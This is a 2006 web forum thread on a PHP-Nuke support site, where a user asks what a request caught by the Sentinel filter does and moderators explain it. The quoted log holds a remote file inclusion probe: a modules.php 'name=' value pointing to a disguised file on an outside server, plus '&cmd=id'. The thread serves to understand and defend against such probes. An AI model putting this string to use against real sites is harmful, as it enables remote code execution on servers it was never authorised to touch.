PHP Web Host - Quality Web Hosting For All PHP Applications Sign up for PayPal and start accepting credit card payments instantly
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
Dauthus
Worker
Worker


Joined: Oct 07, 2003
Posts: 211

PostPosted: Sun Feb 12, 2006 1:36 pm Reply with quote Back to top

I keep getting a filter block on from a certain web page. Can anyone give me an idea of what the code on the page does?

Here's the sentinel info:

Quote:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)

Query String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Get String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Post String: bootleghollow.com/modules.php


Here's the code that shows up on the following link (Obviously not an image file): It is html code.
Only registered users can see links on this board!
Get registered or login to the forums!


I didn't post the code because I thought it might kick in sentinel and get me banned.

Is this anything to worry about? Sentinel has been banning whoever tries to use the script. Just keeps adding different IP addresses to the htaccess files.
View user's profile Send private message Visit poster's website
fkelly
Moderator


Joined: Aug 30, 2005
Posts: 3186
Location: near Albany NY

PostPosted: Sun Feb 12, 2006 3:09 pm Reply with quote Back to top

Subject to validation by some of the experts here, what usually happens in Nuke is that when you move around from module to module or even within a module, everything goes thru modules.php and where it goes next is determined by what follows the name= string that you listed above. Usually it is the "name" of another module within your site, say "news" or "weblinks" or "private_message" or the like. So if they formulate a string like the one you listed they are probably trying to execute a command on a different server where they can stick some kind of hack. They try to disquise that by putting the hack in a file with a gif extension but as you noted it's really html.

I believe Sentinel detects this as cross site scripting and bans it, as you noticed.
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Feb 12, 2006 10:40 pm Reply with quote Back to top

Yep, it is a code that is used to see if your server can be hacked. Ban the IPs, report the URL to the host of that site
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum